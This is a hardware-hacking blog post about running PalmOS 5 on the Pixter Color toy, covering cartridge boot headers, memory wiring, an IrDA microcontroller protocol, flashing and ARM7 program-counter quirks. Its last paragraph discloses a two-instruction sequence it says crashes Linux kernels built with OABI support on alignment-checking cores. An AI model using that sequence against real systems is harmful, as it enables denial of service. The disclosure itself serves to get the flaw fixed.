My initial work involved figuring out how the last two generations of Pixter work and how to get code execution on them, which I wrote a separate article on (which may not yet be publicly up -- I am but one man and editing takes time). The short of it is that the cartridge slot includes access to the full memory bus and two chip-select lines allowing one to connect two memories or memory-like things to the device. The first (seen at PA 0x48000000 ) must connect to a 16-bit-wide ROM which would normally contain the game. I would put a PalmOS ROM there, of course. However, it would need to be formatted such that the Pixter boots it as a game, instead of assuming that the cartridge is invalid. Reverse engineering the Pixter ROM showed me the minimal way to make my ROM bootable. This requires a simple 44-byte header, with the following values at the following offsets: u32@0x00 - 0xAA5566CC (magic number), u16@0x04 - 0x0001 (required version number), u16@0x06 - 0x293c (VM instruction to do a native callout to offset 0x28), u32@0x10 - 0x48000006 (address where the first VM inster is to be seen, I use 0x48000006 ), u32@0x28 - 0x48?????? (address where Pixter OS will jump to in THUMB mode, where our actual execution will begin). I place some code before the 0x28 word to switch to ARM mode and disable interrupts, then jump to my PalmOS ROM which will start at offset 0x30 (for roundness). Thus, after this now-48-byte header, there can follow a normal PalmOS ROM. Pixter Color contains 128KB of RAM the motherboard, which is too little for PalmOS, so we'll use the second chip-select line to attach some RAM. Pixter Multimedia has 4MB of SDRAM onboard, which makes it able to run PalmOS without external RAM.

Initial Slow Pixter Color Bringup

The pinout of the SoC on the Pixter Color was easy to work out since the chip is in an LQFP package and I could buzz-out the pin connections. The User's Guide for Sharp LH75411 was available. Debugging on real hardware is hard, of course, so I wrote a Pixter Color emulator, as detailed in my Pixter article . With this, I was able to bring up a minimal PalmOS image relatively quickly. Then, it was on to making it work on the real device. This was quite a bit more work. George designed a board with a 1MB NOR flash for the OS and some RAM for PalmOS to use, and JLC assembled a few for me. There were a few design decisions made during Pixter Color's design that complicated this project, unfortunately.

Memories are connected to a SoC over a bus. A bus has a width, denominated in bits. For 32-bit ARM chips, external busses are usually 8, 16, or 32 bits wide. The wider the bus, the more bits can be sent over it in the same number of clocks, meaning that it is faster. Obviously, if you write a properly-aligned 32-bit word in your code, a 32-bit bus can transfer it to memory in one transfer. A 16-bit bus will need two -- one for the lower halfword, one for the higher. An 8-bit-wide bus will need 4 transfers to transfer the word, thus being 4 times slower. However, this does not mean that a narrower bus is always slower. Consider the case of writing a single byte. The 8-bit-wide bus can do this in a single tranfer. What do the 16 and 32 bit busses do in this case? Guess!

There are two guesses you could have come up with. The first is: read a bus-width-sized quantity of memory, modify the requisite byte, and then write a bus-width-sized quantity of memory back. This would require two bus transactions for both the 16 and the 32 bit wide busses. This is not what is done, for a variety of reasons which are quite out of scope here. What is actully done is that besides the access, data, and control lines, the wider busses also have a few extra lines, which are called "byte lane select" lines. They tell the memory which of the bytes in the addressed bus-width-sized memory location being addressed are active. So, to write a byte on a 32-bit-wide bus, only one of the byte lane select lines will be active, and the memory will not overwrite the other 3 bytes. This does mean that the memory chips need to support this sort of thing, and they do. Of course this is not an issue for reads - the unneeded 3 bytes of memory for a byte-sized read on a 32-bit-bus can just be ignored by the SoC. Easy!

So, what were the design decisions in Pixter Color that made my life harder? Pixter Color's external cartridge slot exposes 24 bits of address and 16 bits of data. Since ROM is read-only, it needs no byte lane selects and indeed runs in 16-bit-wide mode. Sadly, byte lane select lines are NOT brought out to the cartridge slot. So, what would happen if I were to attach 16-bit RAM without them? Given the explanation above, it is clear -- reads would work fine. Word and halfword writes would work fine too. Byte writes would corrupt the neighboring byte. Clearly this is not going to work for booting PalmOS, which expects all RAM to be byte-addressable. What options are left? Just one -- RAM must be attached in 8-bit-wide mode. This does not require byte lane select lines and will correctly work for attaching RAM to Pixter Color via the cart slot. Sadly, as described earlier, this means that this memory if slower for larger access sizes, which are more common.

There is more to consider here. When memory is accessed, it needs some time from being given an address and being asked to read it until it is expected to reply. Same applies for writes. To give it time, wait states are inserted. A normal bus access with no wait states might reasonably take two bus cycles to read a single bus-width-sized memory amount. The first cycle will present the address to the memory chip, and by the second, it is expected to have a reply ready to be read from the data lines of the bus. If the memory cannot reply that fast (in one cycle, basically), it will need wait states. What determines whether it can reply? Memories come in speed grades, which among other things, tell you how fast it could reply. For exmaple on my Pixter Color cartridges, I use "-70" memory which can reply in 70 nanoseconds. Speed of light is also nonzero, and traces on boards and in conectors have inductance and capacitance, which, together, mean that the signals take time to travel from the SoC to the memory and back. Taken all together, one needs to configure the wait states such that the memory has enough time from truly seeing the control signals to the SoC truly seeing the replies. In Pixter Color's case at the rates I run the bus, this means the external memory runs with 2 wait states. The practical upshot of this is somewhat sad. Imagine a typical 32-bit read of external memory. Since the bus is 8-bits-wide, this will take 4 accesses. With 2 wait states, each access takes 4 cycles. This means the entire 32-bit-wide read takes as much as 4 x 4 = 16 cycles. Now, normally, the SoC's cache would absorb this slowness for reads and the write buffer would help on writes. Which brings us to...

The Worst ARM SoC I've Seen Yet

Pixter Color playing Warfare Inc game

The SoC in Pixter Color has the most minimal ARM7 configuration I've ever seen. The ARM7 CPU design is sold by ARM with a few configuration options that one decides on before instantiating it on a chip. One of the options is whether there is a cache, and of what size. Sharp went with "no thanks". Strike one! The next is whether there is an MMU. This is piece of hardware that allows very granular memory protection and mapping. Sharp went with "no". Strike two! Lacking that, there is an MPU option. This is a simpler memory protection unit - no mapping ability and limited number of regions of protection, but it is still better than nothing. The NintendoDS CPU uses this option, for example. This configuration is so simple, it basically costs no extra silicon at all -- no reason not to choose it. Sharp went with "nah". Strike three!

But this gets even more fun, actually. ARM architectures before version 6 did not really support unaligned memory accesses. An unaligned write acted as if the lower address bits were zero, while an unaligned read would rotate the read word such that the "addressed" byte was at the bottom. Neither of those behaviours act like real unaligned memory access. That is to say that unaligned accesses were almost always a logic error. To catch them, ARM cores have a configuration bit to enable "alignment checking" which will cause an exception if an unaligned access is attempted. Since such accesses are almost always a bug, this checking should almost always be enabled. To configure whether it is or is not enabled, one uses coprocessor 15, which itself is optional. Sharp went with "ooh...optional, eh? NOPE!". Lacking a coprocessor 15, all configurable options become hardcoded to a set value with no ability to change them. In the case of the SoC in Pixter Color this means that alignment checking does not exist, since Sharp could not be bothered to enable it (at a cost of a dozen trasistors, no more). Additionally, this means the exception vectors are always at 0x00000000 , since the ability to relocate them to 0xffff0000 is configured by cp15. This forces us to configure some memory to exist at address zero, which makes trapping NULL-pointer accesses impossible. There goes another error class we cannot trap. We're at five strikes by now... Jeez, Sharp!

Without a cache, our 63MHz CPU ends up spending most of its time waiting on memory. Sharp did put in 16KB of TCM (tightly coupled memory) into the chip. This memory is accessible in a single cycle, making it rather fast. It can also appear anywhere in the address space (it is movable and overlays anything). But it is only 16KB which is very little. There is also 32KB of eSRAM (embedded SRAM) in the chip, which operates with no wait states and is 32 bits wide. This means that accessing it takes two cycles per word -- still quite fast. Pixter Color designers added 128KB of RAM onto the motherboard, as I had mentioned earlier. It is on a 16-bit-wide bus with one wait state. This means that for 32-bit reads, it takes 2 x 3 = 6 cycles per access, making it more than twice as fast the external RAM I put on my external cart. Sadly, 128KB is also not that much in PamOS 5's terms. It does give me a place to put the framebuffer and kernel globals. Better than nothing I guess.

Pixter Memories

Given the complete lack of an MMU or an MPU, how can we protect the PalmOS storage heap from unintended or accidental modification? There is no obvious way. It is not strictly mandatory, of course, but highly desired. An idea came suddenly, while brainstorming how to connect more RAM to the device. Recall those byte lane select lines I explained earlier. They are only meaningful for writes, since for reads, the SoC can just ignore data it does not need. But what do memory chips actually do with those lines on reads? Turns out that they do not ignore them, they use them to mask output lanes. This means that a 16-bit-wide RAM can be used as an 8-bit-wide-ram of double the size by connecting its lower 8 data lines to the higher 8 data lines, connecting an unused address line to byte lane select, and the same address line through an inverter to another byte lane select. Think about it (or look at the schematic below).

This scheme can be expanded further to use a 2-to-4 decoder to connect two x16 RAMS as a x8 RAM with 4x the size. Why am I telling you this? Because the largest PSRAM that could be located for this project was 16x4M, meaning that each chip of it has 4mega words of 16 bit-wide memory (8MB). Two such chips would make 16MB of memory, which is as much as Pixter's 24 external address lines would allow addressing. The 2-to-4 decoder would make this possible. Now, back to protection. Say, we decide up front to use the first 1/4 of the external ram as the dynamic heap, and the last 3/4 as the storage heap. The logical OR of the top address bits would be one for any storage access and zero for dynamic memory access. Add one more gate and a GPIO pin, and we have ability to ignore write to the storage area by blocking the "write enable" signal. Now, this will not tell us that an access was blocked - the Pixter Cart slot lacks an ability for us to send back an error to the SoC, but at least the errorneous write would be ignored. This scheme was implemented, tested, and found working! Cool!

Why was PSRAM used? Pixter Color's SoC lacks any support for dynamic memory, which is what we use nowadays. Real SRAM (static memory), does not come in megabyte sizes, at least not on the budget I had in mind. PSRAM is a nice middle ground. It is dynamic memory with internal mechanisms to refresh itself. Externally it pretends to be static memory. It is not as chepa as dynamic memory, but when you need huge SRAMs, PSRAM might be all you can realistically get.

Pixter Color showing rePalm boot screen surrounded by 8 rePalm Pixter Color cartridges

The first revision boards had just 1MB of flash, as I had mentioned. This is rather little to squeeze in a full PalmOS 5 image. I did manage, with a lot of effort, but it was right and I had to make some tough decisions and even rewrite one library in assembly to save ten bytes! Needless to say, revision 2 boards featured a much more roomy 8MB flash chip. This allowed fo includion of all the standard PalmOS PIM apps as well as some games and utilities. There is even 2MB still free in ROM. The only issue was that this part wa snot srocked by JLC, forcing me to order it separately, and wait for them to recieve it before they could assemble the boards for me. As the PSRAM and the Flash are both BGA-packaged chips, assembling at home was a non-starter.

Pixter Displays

The first Pixter Color I got my hands on (and, really, most of the Pixter Color devices produced) featured an STN color display of such poor quality, that I stuggled to call it "color". If you recall color laptop displays from the early 1990s, you can imagine this one too. The colors shifted with the slightest head movement, and the contrast slider allowed free adjustment from "muddy washed out dark browns" to "muddy washed out light greys" without any good middle "passable colors" state. Well, you play with what you have. STN displays need their controller to work hard to show gradations of color. This is done by temporal dithering (quickly alternating a pixel between on and off to create the illusion of a middle state). The ditherrer in the SoC allowed 15 brightness values per color channel. Yes, not 16. Indeed there are 16 values, but the middle two produce the same brightness, as is clearly documented in the SoC's user guide. This means that with this SoC, this display could display 15 x 15 x 15 = 3375 colors.

The display controller supports direct color mode, but sadly not in the normal RGB565 mode, but in the who-the-hell-asked-for-this XRGB1555 mode which PalmOS (and literally every other piece of software to ever use 16-bits-per-pixel displays) has no use for. Oh well, not like this display could display enough colors to make the 16-bits-per-pixel mode worth it. I decided to just support the 1, 2, and 4 bits-per-pixel greyscale modes and the 8-bits-per-pixel paleted color mode. This should be enough to run most PalmOS 5 software and, given the shittiness of this device, one should grade on a curve! When PalmOS sets a pallete entry, I pick the closest of the 3375 colors to the requested RGB888 triple.

Making Pixter IrDA work

Pixter Color recieving a hand-drawn note over InfraRed

Most SoCs' UARTs support IrDA SIR modulation, allowing one to simply connect an IrDA transciever to the pins and immediately send and receive bytes via InfraRed. Of course the minimum-spec SoC in the Pixter Color does not have this option. I bet they saved a whole 0.0001 square millimeters of silicon by not having this option, the stingy bastards! I wanted InfraRed to work, though. There are chips that simply convert normal serial port signals to IrDA SIR modulation and back. This would be the simple solution, but due to how they work, they also need a stable clock input at the precise rate of 16x the current baudrate. As making IrDA work properly requires ability to negotiate a variable baudrate between 9600bps and 115,200bps, this means I'd need ability to drive out a stable variable clock on a cartidge pin. While this SoC can output a given clock, none of the pins capable of it connect to the cartridge slot. No, this approach would not work. What alternatives are there?

Well, I did say that most SoCs' UARTs support IrDA SIR modulation. This is also true of small cheap microcontrollers, and even chinese clones of small cheap microcontrollers. Thus, the new plan was to use a simple microcontroller to talk IrDA to an InfraRed transciever and normal serial port protocol to the SoC, over the cart slot. Luckily, among the various pins connected to the cart slot, there are two complete serial ports available for functional assignment to some of the pins. Score! One can be used for serial debugging and the other -- for this. A thought occurs, however. We need to not only send data to and from this microcontroller, but also control signals, eg to tell it to adjust the baudrate, or to update its firmware. This means that we need to talk to it at a higher rate than InfraRed ever would use, to provide for the extra overhead of whatever protocol I invent to make this all work. I decided on 2x the max IrDA rate - 230,400bps. The microcontroller chosen was the very cheap APM32F003F6U6 from Geehy. It had two serial ports with IrDA abilities, could be clocked form an external oscillator at a frequency quite amenable to generating UART clocks (11.0592 MHz), and was available as a stock part at JLCPCB. I figured that it was just like any other cheap Cortex-M0 and I would be able to find a common language with it. This turned out to be true, and it took only an hour to get CortexProg to program it.

Getting this microcontroller to do UART was harder. The documentation was rather sparse, and I searched in vain for any way to assign a given pin to be a GPIO or a function pin. This is typical in most microcontrollers, including other families of MCUs from Geehy. But not this one, evidently. Eventually, I figured out that if you enable a peripheral, it simply takes over the requisite pins on this chip. This, however, did not explain why I could get UART1 working, but not UART3. Eventually, I realized that while UART1 had simply an enable bit, UART2 has that plus an extra "ENABLE" register which needs to be set to enable it, while UART3 has that plus an extra-extra "IO ENABLE" register that also needs to be set. Docs were not at all clear about this. This got me to another impasse. UART3 recieve worked fine, but transmit did not, pin just sat at zero volts. It is, of course, at this point that I noted that the pin that UART3 used for TX is a hardware open-collector pin, meaning that It simply cannot source any current, only sink it. In human terms, this means: it needs a pull-up resistor to be of any use at all whatsoever. So, I enabled the pull-up on the Pixter Color's SoC side of that wire, and I had bidirectional communication!

Designing protocols over UARTs is a bit of a pain. Almost any noise on an otherwise-idle line will turn into a 0xFF byte. Any character can be lost to a framing error if noise causes its stop bit to appear low. And any character can be corrupted by noise during its data bits. Parity can be used to add some resilience to this, allowing, at least, likely detection of corrupted bytes. But parity support is not alway present and does not always work. Since any byte can also go missing, how does one design a resilient protocol? If you send a length byte, and it gets corrupted, the reciever might be waiting for a lot more data than you intend to send, and thus get stuck. Conversely, the reciver might think the packet ended sooner than it really did and interpret the next byte of data at a packet header -- not good. Many ways can be invented to resolve this. A typical one is to simply somehow mark "start of packet" allowing the reciever to resynchronize in case of a sync-loss. A special byte can be used, but then that byte is not allowed in the packet contents. It must be escaped somehow. And what if the packet being sent happens to be made of just that byte? Escaping it might blow the packet size up by a factor of two. Another common method is to use the UART in 9-bit-mode, and just use the top (8th) bit as a "start of packet" marker. This has the benefit of not needing any escaping. The issue is that 9-bit-character support is not uniform among all the UARTs our there. Pixter SoC's UARTs, for example, do not support this. Not good. A third method is using a BREAK . This is when the data line for the UART is low for a full character length, including the stop bit. Most UARTs support recieving this and noting it as such. Sending it is a bit harder. Some UARTs, like the one in the APM32F003F6U6, can send a proper-length break simply by setting a bit and waiting for it to self-clear. This is not common. Most commonly, there is simply a "SEND BREAK" bit that lowers the TX line, and it is up to you to make sure you keep it low long enough. Annoying. This is what the Pixter SoC can do. At least this is what it advertises being able to do. In reality, I found that it worked unreliably. Sometimes using this feature would place the UART into a weird state where it could not transmit again. I found a workaround: I can reconfigure the TX pin as a GPIO and literally just take it low, wait, then reconfigure it back. The UART unit need not even know, and it does not get wedged! Win!

The protocol I designed is simple but not symmetric, since while Pixter might have a lot of control data to send to the microcontroler (configuration, updates), the microcontroller rarely has much to say to the Pixter other than what InfraRed data it got. From microcontroller to Pixter, it is as follows: any byte receved is an InfraRed data byte, unless preceded by a BREAK . If it was, the top 2 bits determine what it is. 00 means that it is a start byte of a longer packet, the lower 6 bits give the packet type. Each packet type has a fixed length. 01 means that it is a lower nibble of a non-first byte of a longer packet, bits 4 and 5 must be zero. 10 means that it is a higher nibble of a non-first byte of a longer packet, bits 4 and 5 must be zero. 11 means it is a one-byte control packet. You can see that "longer packets" thus get blown up in size by a factor of 4. This is fine since this is rare, the only such packet defined is the "version info packet". Actual IrDA data arriving can interrupt transmission of such packets, since any byte not preceded by a BREAK is treated entirely differently. The one-byte control packets allow for flow control. This is needed since this interface is at 230,400bps while IrDA is at 115,200 max. Pushback ability is needed from the microcontroller to PalmOS to keep it from overflowing the microcontroller's TX buffer. This range is also used to signal various framing errors in recived IrDA data. For more detals you can see "pixterComms.h".

The protocol from the Pixter to the MCU is different. Here, a BREAK is sent before the start of a packet. Then comes a byte that describes the packet. The top 2 bits determine packet type. 00 - simple command where bits 0..5 determine command type, each has a fixed length. Examples are: "get version info", "reset", "set IrDA config". 01 - IrDA data. Bits 0..5 give data length minus one. That many bytes of data to send follow. 10 - firmware update data. Same length encoding as for IrDA data. 11 - reserved for future use. Firmware data is further decoded based on the first few bytes. Again, for details see "pixterComms.h". When PalmOS starts trying to send IrDA data, a packet is sent off to the microcontroller right away, no waiting. This means that usually it just contains one byte of data. By the time it is sent, PalmOS might have added 5 or 6 bytes more to the TX buffer, and those are sent in a longer packet, by the time that is sent, much more data has been added to the TX buffer, and maximum-length packets can be sent to the MCU. Keep in mind also that Pixter-to-MCU comms are at least 2x as fast as IrDA comms are, which helps here. This design minimizes delays to start getting the data out. This matters since IrDA protocol timeouts give a limited amount of time to START recieving data, with more time available once the data starts coming in.

A screenshot of Saleae Logic software debugging InfraRed communications with two lines depicting UART traffic and two depicting IrDA traffic, one inverted

Debugging IrDA was a huge pain in the posterior, exacerbated by the fact that there exist no good working IrDA SIR decoders for Saleae Logic . Wihout my Logic 16 PRO and various analyzers, I'd be very lost. Seriously, this thing is a huge force multiplier, if you do not have one, you are developing on hard mode for no reason. I do not get paid to say this, I just really love this thing! In any case, since there was no analyzer for IrDA SIR, I wrote one. It properly decodes all bit lengths, parity settings, marks start and stop bits, shows errors, and supports both inverted (RX) and normal (TX) signalling. Most importantly, it allowed me to debug a few issues I had caused. As I had done in the past , I sent my analyzer's source to the good people at Saleae for consideration for inclusion in the Logic software, so that no others will ever need to suffer the indignity of decoding IrDA SIR one bit at a time by hand.

The practical upshot of all of this is that it all works! IrDA communications work. MCU firmware updates also work. For that last one to work, there is a tiny (400 bytes) bootloader in the MCU that copies an uploaded validated image to the main flash area on boot if the version field differs. If the image was not fully uploaded, it will not be seen as valid. If the copy is interrupted, it'll resume on next boot. There is way to brick the MCU as long as the bootlaoder is not touched!

There was one more thing the MCU needed to do. There is a pin on the cart slot that needs to be high for the Pixter Color to believe that a cart is inserted. After this check, the pin is usable for ... whatever. I ended up not using it for anything, but it is wired to the MCU. This does mean that soon after boot, the MCU needs to raise it and keep it high until rePalm takes over from Pixter's OS. It does this. Without this code, Pixter Color will boot-loop as long as the cart is inserted, neither booting nor giving up, forever. Curiously, Pixter Multimedia does not care about this pin and never checks it.

Getting and Flashing the Pixter Carts

Pixter Color cart Schematic

Since the cartridge boards feature a parallel 16-bit-wide NOR flash, I needed some way to program them initially. George designed and JLCPCB manufactured a flasher board for me, based on the wonderful RP2350 , which is pretty much the best microcontroller you can get today (not merely an opinion, a true fact, fight me!). This board also has a cart slot similar to the one in Pixter, the VERY not cheap 302-060-221-201 . I use this to program each Pixter Color cart once. I then use CortexProg to program the microcontroller. After this, self-firmware-update from inside PalmOS can be used for flashing, as long as you do not accidentally flash a broken image!

I wrote a PalmOS updater that loads the update ( /ROM.BIN ) from an SD card into RAM and then disables interrupts (since various drivers might be part of the OS image which we are about to slowly partially erase and overwrite), and then flashes the NOR flash with the new image. Before doing this, it also updates the MCU firmware ( /FIRMWARE.BIN ), if the replacement firmware has a higher version number. The entire process takes slightly more than four minutes, making it much faster than manual flashing with the flashing tool described above. Also, this brings updates to the users of these carts who do not have a flashing tool I described above.

Did I say users ? Yes! Fifteen of these were manufactured for those who wanted them and are now with their happy users. The cost to manufacture them ended up being around $50 each, making them a bit more expensive than a used Pixter Color on eBay. There is a chance that I'll run another production run, so if you want one, email me . Alternatively, you can have your own boards made and assembled using these files . Board thickness should be 1.2mm. Initial flashing is left as an exercise to the reader.

Pixter Polish

Pixter Color running Palmkedex showing Marill's page

Now that basic PalmOS 5 worked (slowly), it was time for some polish. First of all, those buttons below the screen initially did nothing. But why not make them do something? The first one looked like a pencil. I wired it up to send a special unused keycode, and then wrote a timy hack called PixterEnabler that catches this key and toggles onscreen writing. Since there was no documented API to control on-screen writing, I had to reverse-engineer the GrafitiAnywhere module. While doing that, I found that it had an unused-ever-before capability to change the ink color. I went with bright green.

The third from the right button was used in Pixter's native OS to bring up settings, which include contrast adjustment. I wired this up to bring up the PalmOS contrast adjustment dialog. Reverse engineering how Pixter Color controls display contrast took some work. It is weird. It uses an R-2R resistor ladder and 4 GPIO pins to create one of 16 voltage levels that are then fed as an input to the display driver. Figuring it out took a while, wiring it up to PalmOS took all of a few seconds. Cool! This would do for now. More later.

Pixter Color's CPU is simply not fast enough to do sampled audio playback. Lacking a real codec with a DAC, one would have to use the PWM unit, and take an interrupt every sample to reset it to a new value. Given the slowness of rhe CPU and memory subsystem, this would not work. I did try it. 44,100Hz uncompressed WAV playback used about 98% of the CPU cycles. This means that games with audio would be too slow to play and realtime MP3 decoding is a fevered dream of a madman. Given this, I decided to instead support the "simple sound" API of PalmOS. You may know it as "the beeps and the boops" that the earlier devices used. This can be done by simply programming the PWM unit once as "tone start" and again at "tone end". This allows for simple tunes, alarm sounds, and UI clicks to work. Good enough.

Pixter devices also have an internal melody chip, as my main Pixter article mentions . I thought that it would be cool to allow starting and stopping melody playback from PalmOS. The timing on the control interface is rather tight, forcing me to write the code in ARM assembly and use rePalm-specific high-resolution timer API. Nonetheless, it worked and you can indeed start and stop melody playback using the PixterMelodyCtl app. Since the playback is entirely independent of the OS, it will continue until stopped, including across firmware updates. I did code PixterMelodyCtl to send the "stop melody" command on PalmOS reset, so that at least it would stop on reboot. A video of this is in the rePalm photos album linked-to above.

Pixter Color actually has one physical button. It is the pinhole on the back that the native Pixter OS uses to cause pen recalibration. This makes sense since a messed-up calibration would make tapping on-screen buttons impossible, so a real button is needed. I wired this up in PalmOS as hard button #1, and it can be mapped to any application using the usual Buttons Prefs Panel. I considered wiring this up as a soft reset button, as it is reminiscent of those, but the device has a perfectly working power switch on the side, toggling which causes a perfectly good reset. Actually making this button work was nontrivial. You see, it is not wired to any pin that can cause an interrupt to the CPU. Instead, in the timer-overflow handler which runs in FIQ mode (for speed) at around 120Hz, I check its state, do some quick debouncing, and if it changed state, enqueue a normal low-priority interrupt that will later be handled to deal with it. The same check-and-debounce-in-periodic-FIQ method is used to detect SD card insert/remove, for the same reason.

There is, of course, no SDIO support in Pixter Color's SoC. There is SPI support, but none of the pins available on the cart slot are connected to the SPI unit in the SoC, so that would be of no use either. I ended up bit-banging the SPI interface for SD card support in assembly. You'll recall that the CPU in Pixter Color is super slow, and so is the memory. I spent a little bt of my fast TCM to keep these SPI bit-banging routines fast. The final result is that my code reaches access speeds around 3.8Mbit/s, which is not all that terrible. Of course, this uses the CPU so nothing else can really transpire while this goes on. Oh well. It does work, allowing backups to card and loading games from card!

Battery State

Pixter Color showing a battery voltage of 5.34V at a charge state of 73%

Luckily, converting a voltage to an approximate state of charge for alkaline batteries is trivial. Once I figured out how the battery voltage was hooked up to the SoC's ADC and at what scale (0.25, evidently), I was able to measure batery voltage. A conversion of battery voltage occurs at every pen down, pen movemement, or every 500ms. These values are smoothed and converted to a percentage that is properly handed to PalmOS. Curiously, in PalmOS 5, there is no official or even unofficial API to get battery voltage, only percent charge. This is actually not unreasonable, since battery technologies evolve and user-level applications have no business trying to understand voltages. Current battery state of charge is enough for applictions. That being said, in PalmOS 4, there was such an API. In PalmOS 5, for compatibility it still exists, but in a fake way. It will read the current state of charge and map it linearly onto 3.7V - 4.2V range. I decided that it would be hilarious to expose the true battery voltage to applications that ask for it, so I added a small hack in my DAL to do so. Now applications using PalmOS 4 APIs can query and properly display the true battery voltage. The reason this is funny is because Pixter runs on 4 series-connected AA batteries, which means it'll see around 6V when full. No Palm OS device before had ever run on such a high battery voltage and I was curious what applications would do with this, and whether anything would break. Nothing did.

ARM7 quirks

The ARM7 core used by Pixter's SoC implements ARM architecture version 4T, which is, in theory, good enough for PalmOS 5.x. You could have guessed this based on the whole story above - I got it to work afterall, right? Well, PalmOS ran on a number of ARMv4T processors, but all of them were ARM9 CPU or later. ARM7 CPU design is a bit older and a bit slower, which is not a disaster and you are probably tired of hearing about the slowness already, but it has a few other quirks which would turn out to become quite a pain when it came time to run my favourite PalmOS game - Warfare, Inc. .

As mentioned elsewhere in this increasingly long article, ARMv4T processors can execute instructions in one of two formats. ARM instructions are always 4 bytes long and occur only at memory addresses divisibly by 4 (this is called "self-aligned"). Thumb instructions are always 2 bytes long (do not believe anyone who tells you that the BL instruction is 4 bytes long, in ARMv4T, BL is actually two instructions, each of which can be executed independently and each is two bytes long), occuring at memory locations divisible by 2 (also self-aligned). These instructions cannot be freely mixed, since the CPU would not know how to interpret the next bytes. Instead, the CPU has an internal method to track which instruction set mode it is in (bit 5 in CPSR , if you are curious). There are a few ways to switch this mode. In ARMv4T, there are precisely two ways. One of them is returning from an exception. This is only used by the OS kernel and not by any normal user code. The second is the BX (branch and exchange) instruction. This instruction takes a register as a parameter and jumps to the address it contains. Since both ARM and Thumb instructions occur at even addresses, the lowest bit of the address register is by-definition not meaningful. The CPU uses that bit to decide what mode to switch to - ARM if it is zero, Thumb if it is one. Good so far. Let us analyze all 4 possible cases of the lower 2 bits of the register passed to BX . "01" and "11" are both valid options, both go to Thumb code either at an address that is even but not divisible by 4, or to an address that is divisible by 4. "00" is also a valid option. This will go to ARM code at an address divisible by 4, as ARM instructions ought to be. Quite clear. It is the last case -- the "10" case that is of most interest to us.

ARM architecture reference manual says "If Rm[1:0] == 0b10, the result is UNPREDICTABLE, as branches to non word-aligned addresses are impossible in ARM state." OK, fine. Most often BX is used to return from functions. Clearly the return address should always be valid and this case should not come up. The second-most common use case of BX is to call a function via a function pointer. This should also only use valid pointers with proper aligment and nothing should ever be the matter. Fine. But, there is a third case. Say you are executing in Thumb mode, but wish to call an ARM function. You cannot directly BL to it, since that will leave you in Thumb mode. You could calculate its address and BX to the register containing it, but this is a lot of cycles. There is a third method, and a common one. You BL to a tiny thunk containing a single Thumb instruction: BX PC . Since when it is read, PC never has the low bit set, and since in Thumb mode it reads as the address of the current instruction plus 4, this will execute a BX with a value with the lowest bit clear and the rest of the bits pointing 4 bytes past this instruction's start (2 bytes past its end). This will cause a switch to ARM mode and continuation of execution at that address in ARM mode. There, one places an ARM B instruction to jump to the desired function. When that function returns (using BX LR ), it will jump back to Thumb mode at the call site just past the BL , since the BL had set up the LR register thusly, as is its job. Did you spot a potential issue?

This will all work wonderfully as long as the BX PC instruction is at an address divisible by 4. If it is not, we end up with the above-mentioned "10" case which is, I quote again "UNPREDICTABLE". Does the ARM ARM tell us anything more about this precise case? It does (in the section on the BX instruction)! "Register 15 can be specified for <Rm>. If this is done, R15 is read as normal for Thumb code, that is, it is the address of the BX instruction itself plus 4. If the BX instruction is at a word-aligned address, this results in a branch to the next word, executing in ARM state. However, if the BX instruction is not at a word-aligned address, this means that the results of the instruction are UNPREDICTABLE (because the value read for R15 has bits[1:0]==0b10)." Well, that is pretty clear, this case is unpredictable and nobody should do this. Fine!

The issue is, some PalmOS games that were compiled with an antique version of ARM gcc DO do this. I ran into this while writing the main article on the project, and mentioned the special handling I had to do for it . Somehow, this never broke on any PalmOS 5 device. What gives? It turns out that on ARMv5 and later, whenever the CPU is in ARM mode, the lower 2 bits of PC are forced to zero immediately on any write. So the BX PC at an address that is not divisibile by 4 will simply jump to an address 2 less, which is divisible by 4. This seems to be what the old ARM gcc version expected and relied on. However, PalmOS 5 ran on ARMv4T as well. How did it ever work there? Well, it seems that ARM9 CPUs do the same thing. All PalmOS 5 devices on ARMv4T CPUs used ARM9 cores. No PalmOS 5 device ever ran on an ARM7 core. I made the first one! So, what does ARM7 do in this case?

What exactly does ARM7 do with PC[1] in ARM mode?

This investigation took quite a bit of time, since I wanted to make sure I understood the behaviour entirely so that I could emulate it properly in uARM for simplified debugging in the future. I found no information on this anywhere, so this might be the first documentation on the subject. ARM7 CPUs do not force PC [bit 1] to 0 when PC is written. You can write PC using any method you choose with that bit set, and nothing bad will befall you ... at least not immediately. Instruction fetches in ARM mode do not send PC [bits 0..1] on the bus, so instructions will continue to be fetched and execute as expected. If an exception is taken, the value of PC seen by the exception handler will reflect the true value of PC [bit 1], and a return from exception will properly restore it. The value of PC [bit 1] will survive a function call and return as well, causing no ill effects. Reading PC directly will also show the true value of PC [bit 1]. This is where you're likely to hit your first problem. You see, ARM instructions make it rather difficult to load large immediate values into registers, so it is common to load them from a "literal pool" - literally a set of word-sized constants at the end of the current function. Such a load usually takes the form of a PC-relative load instruction, like this: LDR Rx, [PC, #0x124] . Since PC is expected to always be word-aligned, the offsets used also are, producing a word-aligned address whence a word will be loaded. What happens if our PC [bit 1] is set? The produced address will not be word aligned. What happens then? If your CPU has alignment checking enabled, you take an exception due to a misaligned load. And what if your CPU, like the one in Pixter Color's SoC, has no alignment checking ability, or if you simply turned alignment checking off? ARM ARM quoth: "Load single word ARM instructions are architecturally defined to rotate right the word-aligned data transferred by a non word-aligned address one, two or three bytes depending on the value of the two least significant address bits." So, you'll simply load the immediate value you intended to load, except rotated right by 16 bits (swapping the lower and the upper halfwords). I'll let you imagine the havoc that doing this to all constants would cause.

Curiouisly, there is another place this can cause issues. A typical way to call an OS kernel is a SWI instruction, which, in ARM mode, encodes a 24-bit immediate in its lower 24 bits. A kernel would usually read the imediate to figure out what the requested syscall number is. Since in the exception handler, LR is expected to point just past the SWI instruction, a typical way to get this immediate is LDR R0, [LR, #-4]; BIC R0, #0xFF000000 . See the issue here? If PC was misaligned, your kernel would have just taken an aligment fault, or (if alignment checking is off) simply read the wrong value. A kernel aware of this quirk would instead do something like this: BIC R0, LR, #3; LDR R0, [R0, #-4]; BIC R0, #0xFF000000 . Fun story: Looking at what Linux does , it looks like a possible user-space DoS on Linux in just two instruction . Would that be a record? If the kernel was configured to support OABI (exclusively or together with EABI), the following two-instr binary will simply crash the kernel if the core has aligment checking: SUB PC, PC, #2; SWI 0 . I am not sure how common such configs are, but someone should maybe fix that?

